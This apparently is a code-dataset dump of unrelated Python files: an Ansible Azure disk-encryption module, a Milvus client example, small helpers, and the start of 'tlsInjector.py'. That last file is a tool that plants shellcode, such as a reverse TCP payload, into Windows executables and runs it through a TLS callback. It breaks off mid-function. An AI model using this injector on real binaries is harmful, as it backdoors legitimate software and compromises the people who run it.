            quantity.ito(unit)
    return assert_almost_equal(first.magnitude, second.magnitude,
                               places=places, msg=msg, delta=delta)
def expected_failure(test):
    """Decorator for tests that are expected to fail, so nose does not crash.

    If the wrapped test raises, the run is reported as a skip; if it
    unexpectedly succeeds, an AssertionError is raised instead.
    See http://stackoverflow.com/q/9613932/2823213.
    """
    @functools.wraps(test)
    def wrapper(*args, **kwargs):
        try:
            test(*args, **kwargs)
        except Exception:
            raise nose.SkipTest
        # No exception from the wrapped test: the expected failure did not happen.
        raise AssertionError('Failure expected')
    return wrapper
| StarcoderdataPython |
3238553 | <gh_stars>1-10
#!/usr/bin/python
#
# Copyright (c) 2021 <NAME>(@techcon65)
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = '''
---
module: azure_rm_diskencryptionset
version_added: "1.9.0"
short_description: Create, delete and update Disk encryption set
description:
- Creates, deletes, and updates Disk encryption set.
options:
resource_group:
description:
- The name of resource group.
required: true
type: str
name:
description:
- The name of the disk encryption set.
required: true
type: str
location:
description:
- Location for Disk encryption set. Defaults to location of resource group if not specified.
type: str
source_vault:
description:
- The name of source key vault containing encryption key.
type: str
key_url:
description:
- The url pointing to the encryption key to be used for disk encryption set.
type: str
state:
description:
- Assert the state of the disk encryption set. Use C(present) to create or update and C(absent) to delete.
default: present
type: str
choices:
- absent
- present
extends_documentation_fragment:
- azure.azcollection.azure
- azure.azcollection.azure_tags
author:
- <NAME> (@techcon65)
'''
EXAMPLES = '''
- name: create disk encryption set
azure_rm_diskencryptionset:
resource_group: myResourceGroup
name: mydiskencryptionset
source_vault: myvault
key_url: https://myvault.vault.azure.net/keys/Key1/e65090b268ec4c3ba1a0f7a473005768
state: present
- name: Update disk encryption set
azure_rm_diskencryptionset:
resource_group: myResourceGroup
name: mydiskencryptionset
source_vault: myvault
key_url: https://myvault.vault.azure.net/keys/Key1/e65090b268ec4c3ba1a0f7a473005768
state: present
tags:
key1: "value1"
- name: Delete disk encryption set
azure_rm_diskencryptionset:
resource_group: myResourceGroup
name: mydiskencryptionset
state: absent
'''
RETURN = '''
state:
description:
- Current state of the Disk Encryption Set.
returned: always
type: complex
contains:
id:
description:
- The disk encryption set ID.
returned: always
type: str
sample: "/subscriptions/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/resourceGroups/myResourceGroup/providers/
Microsoft.Compute/diskEncryptionSets/mydiskencryptionset"
name:
description:
- Disk encryption name.
returned: always
type: str
sample: 'mydiskencryptionset'
location:
description:
- The Azure Region where the resource lives.
returned: always
type: str
sample: eastus
tags:
description:
- Resource tags.
returned: always
type: list
sample: [{"key1": "value1"}]
active_key:
description:
- Reference to Key vault and key used for disk encryption set.
returned: always
type: dict
sample: {
"key_url": "VALUE_SPECIFIED_IN_NO_LOG_PARAMETER",
"source_vault": {
"id": "/subscriptions/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/resourceGroups/myResourceGroup/providers/
Microsoft.KeyVault/vaults/myvault"
}
}
identity:
description:
- The managed identity for the disk encryption set.
returned: always
type: dict
sample: {
"principal_id": "d3abec0a-5818-4bbd-8300-8014198124ca",
"tenant_id": "7268bab5-aabd-44f9-915f-6bf864e879c6",
"type": "SystemAssigned"
}
provisioning_state:
description:
- The provisioning state of the resource.
returned: always
type: str
sample: Succeeded
type:
description:
- The type of the resource.
returned: always
type: str
sample: "Microsoft.Compute/diskEncryptionSets"
'''
from ansible.module_utils.basic import _load_params
from ansible_collections.azure.azcollection.plugins.module_utils.azure_rm_common import AzureRMModuleBase, HAS_AZURE, \
format_resource_id, normalize_location_name
try:
from msrestazure.azure_exceptions import CloudError
from msrest.polling import LROPoller
except ImportError:
# This is handled in azure_rm_common
pass
class AzureRMDiskEncryptionSet(AzureRMModuleBase):
    """Ansible module implementation for Azure disk encryption sets.

    Supports create, update (tags / source vault / key url) and delete, with
    check-mode and idempotent 'changed' reporting.
    """

    def __init__(self):
        # Ansible workaround: pre-load the raw module parameters before the
        # base class parses them.
        _load_params()
        # define user inputs from playbook
        self.module_arg_spec = dict(
            resource_group=dict(type='str', required=True),
            name=dict(type='str', required=True),
            location=dict(type='str'),
            source_vault=dict(type='str'),
            key_url=dict(type='str', no_log=True),
            state=dict(choices=['present', 'absent'], default='present', type='str')
        )
        # source_vault and key_url are only mandatory when creating/updating.
        required_if = [
            ('state', 'present', ['source_vault', 'key_url'])
        ]
        self.results = dict(
            changed=False,
            state=dict()
        )
        # Populated from kwargs in exec_module().
        self.resource_group = None
        self.name = None
        self.location = None
        self.source_vault = None
        self.key_url = None
        self.state = None
        self.tags = None
        super(AzureRMDiskEncryptionSet, self).__init__(self.module_arg_spec,
                                                       required_if=required_if,
                                                       supports_check_mode=True)

    def exec_module(self, **kwargs):
        """Main module logic: diff desired vs. actual state and apply changes.

        Returns the results dict with 'changed' and the resulting 'state'.
        """
        # Copy declared parameters (plus tags) onto the instance.
        for key in list(self.module_arg_spec.keys()) + ['tags']:
            setattr(self, key, kwargs[key])
        changed = False
        results = dict()
        disk_encryption_set = None  # NOTE(review): unused local
        # retrieve resource group to make sure it exists
        resource_group = self.get_resource_group(self.resource_group)
        if not self.location:
            # Set default location
            self.location = resource_group.location
        self.location = normalize_location_name(self.location)
        if self.source_vault:
            # Expand a vault name/partial id into a full Key Vault resource id.
            source_vault = self.parse_resource_to_dict(self.source_vault)
            self.source_vault = format_resource_id(val=source_vault['name'],
                                                   subscription_id=source_vault['subscription_id'],
                                                   namespace='Microsoft.KeyVault',
                                                   types='vaults',
                                                   resource_group=source_vault['resource_group'])
        try:
            self.log('Fetching Disk encryption set {0}'.format(self.name))
            disk_encryption_set_old = self.compute_client.disk_encryption_sets.get(self.resource_group,
                                                                                   self.name)
            # serialize object into a dictionary
            results = self.diskencryptionset_to_dict(disk_encryption_set_old)
            if self.state == 'present':
                changed = False
                # Compare tags, vault id and key url; any difference marks 'changed'
                # and 'results' is mutated to reflect the desired state.
                update_tags, results['tags'] = self.update_tags(results['tags'])
                if update_tags:
                    changed = True
                self.tags = results['tags']
                if self.source_vault != results['active_key']['source_vault']['id']:
                    changed = True
                    results['active_key']['source_vault']['id'] = self.source_vault
                if self.key_url != results['active_key']['key_url']:
                    changed = True
                    results['active_key']['key_url'] = self.key_url
            elif self.state == 'absent':
                changed = True
        except CloudError:
            # Not found: create when present is requested, no-op when absent.
            if self.state == 'present':
                changed = True
            else:
                changed = False
        self.results['changed'] = changed
        self.results['state'] = results
        if self.check_mode:
            # Check mode: report the diff without touching Azure.
            return self.results
        if changed:
            if self.state == 'present':
                identity = self.compute_models.EncryptionSetIdentity(type="SystemAssigned")
                # create or update disk encryption set
                disk_encryption_set_new = \
                    self.compute_models.DiskEncryptionSet(location=self.location,
                                                          identity=identity)
                if self.source_vault:
                    source_vault = self.compute_models.SourceVault(id=self.source_vault)
                    disk_encryption_set_new.active_key = \
                        self.compute_models.KeyVaultAndKeyReference(source_vault=source_vault,
                                                                    key_url=self.key_url)
                if self.tags:
                    disk_encryption_set_new.tags = self.tags
                self.results['state'] = self.create_or_update_diskencryptionset(disk_encryption_set_new)
            elif self.state == 'absent':
                # delete disk encryption set
                self.delete_diskencryptionset()
                self.results['state'] = 'Deleted'
        return self.results

    def create_or_update_diskencryptionset(self, disk_encryption_set):
        """Create or update the set in Azure and return it serialized to a dict."""
        try:
            # create the disk encryption set
            response = \
                self.compute_client.disk_encryption_sets.create_or_update(resource_group_name=self.resource_group,
                                                                          disk_encryption_set_name=self.name,
                                                                          disk_encryption_set=disk_encryption_set)
            if isinstance(response, LROPoller):
                # Long-running operation: wait for completion.
                response = self.get_poller_result(response)
        except Exception as exc:
            self.fail("Error creating or updating disk encryption set {0} - {1}".format(self.name, str(exc)))
        return self.diskencryptionset_to_dict(response)

    def delete_diskencryptionset(self):
        """Delete the disk encryption set, waiting for the long-running operation."""
        try:
            # delete the disk encryption set
            response = self.compute_client.disk_encryption_sets.delete(resource_group_name=self.resource_group,
                                                                       disk_encryption_set_name=self.name)
            if isinstance(response, LROPoller):
                response = self.get_poller_result(response)
        except Exception as exc:
            self.fail("Error deleting disk encryption set {0} - {1}".format(self.name, str(exc)))
        return response

    def diskencryptionset_to_dict(self, diskencryptionset):
        """Serialize an SDK DiskEncryptionSet object (including tags) to a plain dict."""
        result = diskencryptionset.as_dict()
        result['tags'] = diskencryptionset.tags
        return result
def main():
    """Module entry point: instantiating the class runs the Ansible module logic."""
    AzureRMDiskEncryptionSet()


if __name__ == '__main__':
    main()
| StarcoderdataPython |
6477650 | # -*- coding: utf-8 -*-
"""
@date: 2020/5/23 上午10:16
@file: __init__.py.py
@author: zj
@description:
"""
from .convert_from_ints import ConvertFromInts
from .expand import Expand
from .normalize import Normalize
from .random_sample_crop import RandomSampleCrop
from .resize import Resize
from .random_mirror import RandomMirror
from .subtract_means import SubtractMeans
from .to_tensor import ToTensor
from .to_percent_coords import ToPercentCoords | StarcoderdataPython |
1866616 | """
This is an example to demonstrate how to invoke milvus client APIs asynchronously.
There are partial APIs allowed to be invoked asynchronously, they are: insert(), create_index(),
search(), flush() and compact().
This example is runnable for milvus(0.11.x) and pymilvus(0.4.x)(developing).
"""
import random
from pprint import pprint
from milvus import Milvus, DataType
# ------
# Setup:
# First of all, you need a running Milvus(0.11.x). By default, Milvus runs on localhost on port 19530.
# Then, you can use pymilvus(0.4.x)(developing) to connect to the server, You can change the _HOST
# and _PORT accordingly.
# ------
# Connection settings for the Milvus server.
_HOST = '127.0.0.1'
_PORT = '19530'
client = Milvus(_HOST, _PORT)

# ------
# Basic create collection:
# You already have a Milvus instance running, and pymilvus connecting to Milvus.
# The first thing we will do is to create a collection `demo_films`. In case we've already had a collection
# named `demo_films`, we drop it before we create, so the example starts from a clean state.
# ------
collection_name = 'demo_films'
if collection_name in client.list_collections():
    client.drop_collection(collection_name)
# ------
# Basic create collection:
# For a specific field, you can provide extra infos by a dictionary with `key = "params"`. If the field
# has a type of `FLOAT_VECTOR` and `BINARY_VECTOR`, "dim" must be provided in extra infos. Otherwise
# you can provide customed infos like `{"unit": "minutes"}` for you own need.
#
# In our case, the extra infos in "duration" field means the unit of "duration" field is "minutes".
# And `auto_id` in the parameter is set to `False` so that we can provide our own unique ids.
# For more information you can refer to the pymilvus
# documentation (https://milvus-io.github.io/milvus-sdk-python/pythondoc/v0.3.0/index.html).
# ------
# Schema for the collection: two scalar fields plus one 8-dim float vector field.
collection_param = {
    "fields": [
        # Milvus doesn't support string type now, but we are considering supporting it soon.
        # {"name": "title", "type": DataType.STRING},
        {"name": "duration", "type": DataType.INT32, "params": {"unit": "minute"}},
        {"name": "release_year", "type": DataType.INT32},
        {"name": "embedding", "type": DataType.FLOAT_VECTOR, "params": {"dim": 8}},
    ],
    "segment_row_limit": 4096,
    "auto_id": False
}

# ------
# Basic create collection:
# After creating collection `demo_films`, we create a partition tagged "American", meaning the films we
# will insert are from America.
# ------
client.create_collection(collection_name, collection_param)
client.create_partition(collection_name, "American")
# ------
# Basic insert entities:
# We have two films groups of The_Lord_of_the_Rings series and Batman series here with their id, duration
# release_year and fake embeddings to be inserted. They are listed below to give you a overview of the structure.
# ------
# Fixture data: each entity carries an explicit _id (auto_id is False above),
# the scalar fields, and a random fake embedding of the declared dimension (8).
The_Lord_of_the_Rings = [
    {
        # "title": "The_Fellowship_of_the_Ring",
        "_id": 1,
        "duration": 208,
        "release_year": 2001,
        "embedding": [random.random() for _ in range(8)]
    },
    {
        # "title": "The_Two_Towers",
        "_id": 2,
        "duration": 226,
        "release_year": 2002,
        "embedding": [random.random() for _ in range(8)]
    },
    {
        # "title": "The_Return_of_the_King",
        "_id": 3,
        "duration": 252,
        "release_year": 2003,
        "embedding": [random.random() for _ in range(8)]
    }
]
Batmans = [
    {
        # "title": "Batman_Begins",
        "_id": 4,
        "duration": 140,
        "release_year": 2005,
        "embedding": [random.random() for _ in range(8)]
    },
    {
        # "title": "Batman_The_Dark_Knight",
        "_id": 5,
        "duration": 152,
        "release_year": 2008,
        "embedding": [random.random() for _ in range(8)]
    },
    {
        # "title": "Batman_The_Dark_Knight_Rises",
        "_id": 6,
        "duration": 165,
        "release_year": 2012,
        "embedding": [random.random() for _ in range(8)]
    }
]
# ------
# Basic insert entities:
# We insert the `The_Lord_of_the_Rings` into our collection, into partition `American`, with ids we provide.
# Here, we pass parameter '_async=True' to insert data asynchronously, and return a `Future` object which
# has method `result()` to obtain result values and `done()` to wait util the invoked function(here is insert())
# exit.
# ------
print("\n----------insert rings films----------")
insert_future = client.insert(collection_name, The_Lord_of_the_Rings, partition_tag="American", _async=True)
insert_future.result()

# ------
# Basic insert entities:
# We insert the `Batmans` into our collection, into partition `American`, with ids we provide.
# Here, we pass parameter '_async=True' to insert data asynchronously, and pass '_callback=batman_insert_cb'
# to provide a callback function which is called if the data was inserted successfully.
#
# The parameters passed to the callback function are the return values of insert().
# ------
def batman_insert_cb(inserted_ids):
    """Success callback for the async insert; receives the inserted entity ids."""
    print("Films about Batman are inserted and the ids are: {}".format(inserted_ids))


insert_future = client.insert(collection_name, Batmans, partition_tag="American",
                              _async=True, _callback=batman_insert_cb)
insert_future.done()

# ------
# Basic insert entities:
# After inserting entities into the collection, we need to flush the collection to make sure the data
# is on disk, so that we are able to retrieve it.
# ------
print("\n----------flush----------")
flush_future = client.flush([collection_name], _async=True)
flush_future.result()
# ------
# Basic hybrid search entities:
# Getting films by id is not enough, we are going to get films based on vector similarities.
# Let's say we have a film with its `embedding` and we want to find `top3` films that are most similar
# with it by L2 distance.
# Other than vector similarities, we also want to obtain films that:
# `released year` term in 2002 or 2003,
# `duration` larger than 250 minutes.
#
# Milvus provides Query DSL(Domain Specific Language) to support structured data filtering in queries.
# For now Milvus supports TermQuery and RangeQuery; they are structured as below.
# For more information about the meaning and other options about "must" and "bool",
# please refer to DSL chapter of our pymilvus documentation
# (https://milvus-io.github.io/milvus-sdk-python/pythondoc/v0.3.0/index.html).
# ------
# Query vector plus structured filters: release_year in {2002, 2003}, duration > 250
# minutes, and the single (topk=1) nearest neighbour by L2 distance.
query_embedding = [random.random() for _ in range(8)]
dsl = {
    "bool": {
        "must": [
            {
                "term": {"release_year": [2002, 2003]}
            },
            {
                # "GT" for greater than
                "range": {"duration": {"GT": 250}}
            },
            {
                "vector": {
                    "embedding": {"topk": 1, "query": [query_embedding], "metric_type": "L2"}
                }
            }
        ]
    }
}
# ------
# Basic hybrid search entities:
# And we want to get all the fields back in reasults, so fields = ["duration", "release_year", "embedding"].
# If searching successfully, results will be returned.
# `results` has `nq` (number of queries) separate result sets; since we only query for 1 film, the length
# of `results` is 1.
# We ask for the top 1 match (`topk` is 1 in the DSL above); together with the strict term/range
# conditions on our small database we get exactly 1 film, so the length of `entities` below is also 1.
#
# Now we've gotten the results, and known it's a 1 x 1 structure, how can we get ids, distances and fields?
# It's very simple, for every `topk_film`, it has three properties: `id, distance and entity`.
# All fields are stored in `entity`, so you can finally obtain these data as below:
# And the result should be film with id = 3.
#
# Here, we pass parameter '_async=True' to insert data asynchronously, and return a `Future` object.
# ------
print("\n----------search----------")
search_future = client.search(collection_name, dsl, _async=True)
# result() blocks until the asynchronous search completes.
search_results = search_future.result()
# ------
# Basic delete:
# Now let's see how to delete things in Milvus.
# You can simply delete entities by their ids.
#
# After deleted, we invoke compact collection in a asynchronous way.
# ------
# NOTE(review): the banner text says ids 1 and 2, but the call deletes ids 1 and 4.
print("\n----------delete id = 1, id = 2----------")
client.delete_entity_by_id(collection_name, ids=[1, 4])
client.flush()  # flush is important
# Compact reclaims the space of deleted entities; run it asynchronously.
compact_future = client.compact(collection_name, _async=True)
compact_future.result()

# ------
# Basic delete:
# You can drop the partitions and the collection we created.
# ------
client.drop_partition(collection_name, partition_tag='American')
if collection_name in client.list_collections():
    client.drop_collection(collection_name)
# ------
# Summary:
# Now we've went through all basic communications pymilvus can do with Milvus server, hope it's helpful!
# ------
| StarcoderdataPython |
9649184 | <filename>utils/tlsInjector.py<gh_stars>100-1000
#!/usr/bin/env python
import pefile, sys, getopt, os, re, random, string, struct
from colorama import Fore, Style
__author__ = "<NAME>"
__mail__ = "<EMAIL>"
__version__ = "1.0"
class colors:
    """ANSI terminal escape sequences for colored console output."""
    GREEN = '\033[92m'   # bright green
    FAIL = '\033[91m'    # bright red (errors)
    BOLD = '\033[1m'     # bold text
    RESET = '\033[0;0m'  # reset all attributes
    ORANGE = '\033[33m'  # yellow/orange
#Credits to nOps for the SectionDoubleP class: http://git.n0p.cc/?p=SectionDoubleP.git. This saved me a lot of work
class SectionDoublePError(Exception):
    """Raised when adding or adjusting a PE section fails."""
    pass
class SectionDoubleP:
    def __init__(self, pe):
        # Keep a reference to the pefile.PE instance being modified in place.
        self.pe = pe
    def __adjust_optional_header(self):
        """ Recalculates the SizeOfImage, SizeOfCode, SizeOfInitializedData and
            SizeOfUninitializedData of the optional header.
        """
        # SizeOfImage = ((VirtualAddress + VirtualSize) of the new last section)
        self.pe.OPTIONAL_HEADER.SizeOfImage = (self.pe.sections[-1].VirtualAddress +
                                               self.pe.sections[-1].Misc_VirtualSize)
        # Reset the three size fields before re-summing them below.
        self.pe.OPTIONAL_HEADER.SizeOfCode = 0
        self.pe.OPTIONAL_HEADER.SizeOfInitializedData = 0
        self.pe.OPTIONAL_HEADER.SizeOfUninitializedData = 0
        # Recalculating the sizes by iterating over every section and checking if
        # the appropriate characteristics are set.
        for section in self.pe.sections:
            if section.Characteristics & 0x00000020:
                # Section contains code (IMAGE_SCN_CNT_CODE).
                self.pe.OPTIONAL_HEADER.SizeOfCode += section.SizeOfRawData
            if section.Characteristics & 0x00000040:
                # Section contains initialized data (IMAGE_SCN_CNT_INITIALIZED_DATA).
                self.pe.OPTIONAL_HEADER.SizeOfInitializedData += section.SizeOfRawData
            if section.Characteristics & 0x00000080:
                # Section contains uninitialized data (IMAGE_SCN_CNT_UNINITIALIZED_DATA).
                self.pe.OPTIONAL_HEADER.SizeOfUninitializedData += section.SizeOfRawData
    def __add_header_space(self):
        """ To make space for a new section header a buffer filled with nulls is added at the
            end of the headers. The buffer has the size of one file alignment.
            The data between the last section header and the end of the headers is copied to
            the new space (everything moved by the size of one file alignment). If any data
            directory entry points to the moved data the pointer is adjusted.

            NOTE: this module is Python 2 code (xrange, str-based byte buffers).
        """
        FileAlignment = self.pe.OPTIONAL_HEADER.FileAlignment
        SizeOfHeaders = self.pe.OPTIONAL_HEADER.SizeOfHeaders
        data = '\x00' * FileAlignment
        # Adding the null buffer.
        self.pe.__data__ = (self.pe.__data__[:SizeOfHeaders] + data +
                            self.pe.__data__[SizeOfHeaders:])
        # File offset of the section table: e_lfanew + PE signature (4 bytes)
        # + file header + optional header.
        section_table_offset = (self.pe.DOS_HEADER.e_lfanew + 4 +
                                self.pe.FILE_HEADER.sizeof() + self.pe.FILE_HEADER.SizeOfOptionalHeader)
        # Copying the data between the last section header and SizeOfHeaders to the newly allocated
        # space.  0x28 is the size of one IMAGE_SECTION_HEADER entry.
        new_section_offset = section_table_offset + self.pe.FILE_HEADER.NumberOfSections*0x28
        size = SizeOfHeaders - new_section_offset
        data = self.pe.get_data(new_section_offset, size)
        self.pe.set_bytes_at_offset(new_section_offset + FileAlignment, data)
        # Filling the space, from which the data was copied from, with NULLs.
        self.pe.set_bytes_at_offset(new_section_offset, '\x00' * FileAlignment)
        data_directory_offset = section_table_offset - self.pe.OPTIONAL_HEADER.NumberOfRvaAndSizes * 0x8
        # Checking data directories if anything points to the space between the last section header
        # and the former SizeOfHeaders. If that's the case the pointer is increased by FileAlignment.
        for data_offset in xrange(data_directory_offset, section_table_offset, 0x8):
            data_rva = self.pe.get_dword_from_offset(data_offset)
            if new_section_offset <= data_rva and data_rva < SizeOfHeaders:
                self.pe.set_dword_at_offset(data_offset, data_rva + FileAlignment)
        # 0x3C is the fixed offset of SizeOfHeaders inside the optional header.
        SizeOfHeaders_offset = (self.pe.DOS_HEADER.e_lfanew + 4 +
                                self.pe.FILE_HEADER.sizeof() + 0x3C)
        # Adjusting the SizeOfHeaders value.
        self.pe.set_dword_at_offset(SizeOfHeaders_offset, SizeOfHeaders + FileAlignment)
        # 0x14 is the offset of PointerToRawData inside a section header.
        section_raw_address_offset = section_table_offset + 0x14
        # The raw addresses of the sections are adjusted.
        for section in self.pe.sections:
            if section.PointerToRawData != 0:
                self.pe.set_dword_at_offset(section_raw_address_offset, section.PointerToRawData+FileAlignment)
            section_raw_address_offset += 0x28
        # All changes in this method were made to the raw data (__data__). To make these changes
        # accessible in self.pe __data__ has to be parsed again. Since a new pefile is parsed during
        # the init method, the easiest way is to replace self.pe with a new pefile based on __data__
        # of the old self.pe.
        self.pe = pefile.PE(data=self.pe.__data__)
def __is_null_data(self, data):
""" Checks if the given data contains just null bytes.
"""
for char in data:
if char != '\x00':
return False
return True
    def push_back(self, Name, VirtualSize=0x00000000, VirtualAddress=0x00000000,
                RawSize=0x00000000, RawAddress=0x00000000, RelocAddress=0x00000000,
                Linenumbers=0x00000000, RelocationsNumber=0x0000, LinenumbersNumber=0x0000,
                Characteristics=0xE00000E0, Data=""):
        """ Adds the section, specified by the functions parameters, at the end of the section
            table.
            If the space to add an additional section header is insufficient, a buffer is inserted
            after SizeOfHeaders. Data between the last section header and the end of SizeOfHeaders
            is copied to +1 FileAlignment. Data directory entries pointing to this data are fixed.
            A call with no parameters creates the same section header as LordPE does. But for the
            binary to be executable without errors a VirtualSize > 0 has to be set.
            If a RawSize > 0 is set or Data is given the data gets aligned to the FileAlignment and
            is attached at the end of the file.
        """
        # Sanity check: only proceed when pefile's parsed section list agrees
        # with FILE_HEADER.NumberOfSections.
        if self.pe.FILE_HEADER.NumberOfSections == len(self.pe.sections):
            FileAlignment = self.pe.OPTIONAL_HEADER.FileAlignment
            SectionAlignment = self.pe.OPTIONAL_HEADER.SectionAlignment
            # Section names are limited to 8 bytes in IMAGE_SECTION_HEADER.
            if len(Name) > 8:
                raise SectionDoublePError("The name is too long for a section.")
            # A VirtualAddress that overlaps the previous section's virtual
            # range, or is not SectionAlignment-aligned, is recomputed as the
            # next aligned address after the end of the last section.
            if ( VirtualAddress < (self.pe.sections[-1].Misc_VirtualSize +
                self.pe.sections[-1].VirtualAddress)
                or VirtualAddress % SectionAlignment != 0):
                if (self.pe.sections[-1].Misc_VirtualSize % SectionAlignment) != 0:
                    VirtualAddress = \
                        (self.pe.sections[-1].VirtualAddress + self.pe.sections[-1].Misc_VirtualSize -
                        (self.pe.sections[-1].Misc_VirtualSize % SectionAlignment) + SectionAlignment)
                else:
                    VirtualAddress = \
                        (self.pe.sections[-1].VirtualAddress + self.pe.sections[-1].Misc_VirtualSize)
            # VirtualSize must at least cover the supplied data.
            if VirtualSize < len(Data):
                VirtualSize = len(Data)
            if (len(Data) % FileAlignment) != 0:
                # Padding the data of the section.
                Data += '\x00' * (FileAlignment - (len(Data) % FileAlignment))
            # A caller-supplied RawSize is honoured only when it is larger than
            # the padded data and itself FileAlignment-aligned; otherwise it is
            # recomputed from the (padded) data length.
            if RawSize != len(Data):
                if ( RawSize > len(Data)
                    and (RawSize % FileAlignment) == 0):
                    Data += '\x00' * (RawSize - (len(Data) % RawSize))
                else:
                    RawSize = len(Data)
            section_table_offset = (self.pe.DOS_HEADER.e_lfanew + 4 +
                self.pe.FILE_HEADER.sizeof() + self.pe.FILE_HEADER.SizeOfOptionalHeader)
            # If the new section header exceeds the SizeOfHeaders there won't be enough space
            # for an additional section header. Besides that it's checked if the 0x28 bytes
            # (size of one section header) after the last current section header are filled
            # with nulls/ are free to use.
            if ( self.pe.OPTIONAL_HEADER.SizeOfHeaders <
                section_table_offset + (self.pe.FILE_HEADER.NumberOfSections+1)*0x28
                or not self.__is_null_data(self.pe.get_data(section_table_offset +
                (self.pe.FILE_HEADER.NumberOfSections)*0x28, 0x28))):
                # Checking if more space can be added.
                if self.pe.OPTIONAL_HEADER.SizeOfHeaders < self.pe.sections[0].VirtualAddress:
                    # NOTE(review): __add_header_space() replaces self.pe with a
                    # freshly parsed pefile.PE object, so every earlier reference
                    # to the old object becomes stale from here on.
                    self.__add_header_space()
                else:
                    raise SectionDoublePError("No more space can be added for the section header.")
            # The validity check of RawAddress is done after space for a new section header may
            # have been added because if space had been added the PointerToRawData of the previous
            # section would have changed.
            if (RawAddress != (self.pe.sections[-1].PointerToRawData +
                self.pe.sections[-1].SizeOfRawData)):
                RawAddress = \
                    (self.pe.sections[-1].PointerToRawData + self.pe.sections[-1].SizeOfRawData)
            # Appending the data of the new section to the file.
            if len(Data) > 0:
                self.pe.__data__ = (self.pe.__data__[:RawAddress] + Data + \
                    self.pe.__data__[RawAddress:])
            section_offset = section_table_offset + self.pe.FILE_HEADER.NumberOfSections*0x28
            # Manually writing the data of the section header to the file.
            # The field offsets below follow the IMAGE_SECTION_HEADER layout
            # (Name at +0, VirtualSize at +8, ..., Characteristics at +0x24).
            self.pe.set_bytes_at_offset(section_offset, Name)
            self.pe.set_dword_at_offset(section_offset+0x08, VirtualSize)
            self.pe.set_dword_at_offset(section_offset+0x0C, VirtualAddress)
            self.pe.set_dword_at_offset(section_offset+0x10, RawSize)
            self.pe.set_dword_at_offset(section_offset+0x14, RawAddress)
            self.pe.set_dword_at_offset(section_offset+0x18, RelocAddress)
            self.pe.set_dword_at_offset(section_offset+0x1C, Linenumbers)
            self.pe.set_word_at_offset(section_offset+0x20, RelocationsNumber)
            self.pe.set_word_at_offset(section_offset+0x22, LinenumbersNumber)
            self.pe.set_dword_at_offset(section_offset+0x24, Characteristics)
            self.pe.FILE_HEADER.NumberOfSections +=1
            # Parsing the section table of the file again to add the new section to the sections
            # list of pefile.
            self.pe.parse_sections(section_table_offset)
            self.__adjust_optional_header()
        else:
            raise SectionDoublePError("The NumberOfSections specified in the file header and the " + \
                "size of the sections list of pefile don't match.")
        return self.pe
def banner():
    # ASCII-art banner printed in red, then the colour is reset.
    # NOTE(review): `colors` is presumably a module-level ANSI-escape helper
    # defined earlier in the file (not visible in this chunk) -- confirm.
    print colors.FAIL + "\n __| | __| _ _| _) | "
    print " | | \__ \ | \ | -_) _| _| _ \ _| "
    print "_| ____| ____/ ___| _| _| | \___| \__| \__| \___/ _| "
    print " __/ @BorjaMerino \n" + colors.RESET
def usage():
    """Print the banner followed by the command-line help text and examples."""
    banner()
    print colors.RESET + "Info:"
    print colors.GREEN +" Inject a shellcode into a binary and run it through a TLS callback"
    print colors.RESET + "\nUsage:"
    print colors.GREEN +" -s <file> - Shellcode to be executed by the TLS callback"
    print " -f <file> - Target binary "
    print " -o <file> - Output file (default: tls_injected.exe) "
    print " -t - Create a new section (no code caves search) "
    print " -r - Set basereloc directory to 0x0"
    print " -l <path dll> - Loadlibrary payload: the shellcode will load the DLL supplied"
    print " -h - Help"
    print colors.RESET +"\nExamples:"
    print colors.GREEN + " python tlsInjector.py -s reverse_tcp.bin -f putty.exe -r"
    print " python tlsInjector.py -f putty.exe -l evil.dll -t \n" + colors.RESET
def open_file(arg,mode):
    """Read and return the whole contents of the file *arg* opened with *mode*.

    Prints the OS error and exits the program with status 1 when the file
    cannot be opened or read.
    """
    try:
        # 'with' guarantees the handle is closed even if read() raises
        # (the original leaked the file object and shadowed the builtin
        # name `file`).
        with open(arg,mode) as handle:
            return handle.read()
    except IOError as e:
        # Single parenthesized argument: identical output under Python 2's
        # print statement and Python 3's print function.
        print(colors.FAIL + str(e) + colors.RESET)
        sys.exit(1)
def info_section(section):
print colors.ORANGE + " Name: " + section.Name
print " RelativeVirtualAddress: " + str(hex(section.VirtualAddress))
print " SizeOfRawData: " + str(hex(section.SizeOfRawData))
print " PointerToRawData: " + str(hex(section.PointerToRawData))
print " VirtualSize: " + str(hex(section.Misc_VirtualSize)) + colors.RESET
# Split the sections in two lists: executable sections first, the rest second.
def organize_sections(sections):
    """Partition *sections* into [executable_sections, other_sections].

    A section counts as executable when all three flags are set:
    IMAGE_SCN_MEM_EXECUTE (0x20000000), IMAGE_SCN_MEM_READ (0x40000000)
    and IMAGE_SCN_CNT_CODE (0x00000020).
    """
    required_flags = (0x20000000, 0x40000000, 0x00000020)
    def _is_executable(sec):
        return all(sec.Characteristics & flag for flag in required_flags)
    executable = [sec for sec in sections if _is_executable(sec)]
    others = [sec for sec in sections if not _is_executable(sec)]
    return [executable, others]
def create_section(pe,shellcode,flags):
sections = SectionDoubleP(pe)
sectionName = '.' + ''.join(random.choice(string.lowercase) for i in range(random.randint(1, 6)))
try:
pe = sections.push_back(Characteristics=flags, Data=shellcode, Name=sectionName)
print colors.GREEN + "[+] New section added" + colors.RESET
info_section(pe.sections[-1])
except SectionDoublePError as e:
print colors.FAIL + str(e)
sys.exit(1)
return
# Update the content of the TLS structure to point to the shellcode
def update_tls_structure(rva,pe):
    """Fill in the IMAGE_TLS_DIRECTORY32 located at *rva* and register it.

    The 32 NULL bytes prepended to the shellcode by inject_tls() are used as:
      rva+0  .. rva+23  IMAGE_TLS_DIRECTORY32 (24 bytes)
      rva+24 .. rva+31  AddressOfCallBacks array (one entry + NULL terminator)
      rva+32            start of the shellcode
    All values written are absolute VAs (ImageBase + rva), which is why the
    caller disables ASLR and optionally zeroes the basereloc directory.
    """
    # Set AddressOfIndex (It will point to the same structure, SizeOfZeroFill field)
    # AddressOfIndex lives at offset 8 of IMAGE_TLS_DIRECTORY32; pointing it
    # at rva+16 reuses the directory's own SizeOfZeroFill slot as index storage.
    pe.set_dword_at_rva(rva+8,pe.OPTIONAL_HEADER.ImageBase+rva+16)
    # Set AddressOfCallBacks to point to the callbacks array
    # (AddressOfCallBacks is at offset 12 of the directory).
